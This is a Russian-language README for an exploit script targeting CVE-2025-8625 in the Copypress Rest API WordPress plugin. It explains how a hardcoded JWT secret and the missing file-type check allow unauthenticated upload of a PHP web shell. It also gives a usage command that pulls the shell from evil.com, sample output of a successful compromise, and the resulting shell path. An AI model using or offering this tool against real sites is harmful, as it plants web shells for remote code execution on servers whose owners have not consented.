
Copypress Rest API 1.1 - 1.2 - Отсутствие настраиваемого JWT-секрета и проверки типа файлов, приводящее к неаутентифицированному удалённому выполнению кода
Copypress Rest API 1.1 - 1.2 - Отсутствие настраиваемого секрета JWT и проверки типа файлов, ведущее к неаутентифицированному удалённому выполнению кода
Плагин Copypress Rest API для WordPress (версии с 1.1 по 1.2) уязвим к удалённому выполнению кода через функцию copyreap_handle_image().
Плагин использует жёстко заданный ключ подписи JWT, когда секрет не установлен, и не проверяет типы файлов, что позволяет неаутентифицированным злоумышленникам подделывать токены и загружать произвольные файлы (например, PHP-шеллы) через конечную точку обработчика изображений.
Имя скрипта: CVE-2025-8625.py
Этот Python-скрипт автоматизирует эксплуатацию уязвимости, позволяя вам сгенерировать действительный JWT, отправить специально сформированный запрос и загрузить вредоносный файл (веб-шелл) на уязвимый сайт WordPress.
python CVE-2025-8625.py -u https://target.com -shell https://evil.com/shell.php
-u / --url: Целевой URL сайта WordPress-shell / --shell: Прямая ссылка на ваш веб-шелл или вредоносный PHP-файлПример вывода:
JWT: eyJ0eXAiOiJKV1QiLCJhbGciOi...
HTTP 201: {"created":true,"id":123,"message":"Success"}
Exploit success! Check your shell upload.
Шелл успешно загружен! 🎉
Пример пути к шеллу:
https://target.com/wp-content/uploads/2025/10/shell.php
Этот инструмент предназначен только для образовательных целей и авторизованного тестирования на проникновение.
Использование против целей без явного разрешения незаконно.
Автор: Nxploited (Khaled Alenazi)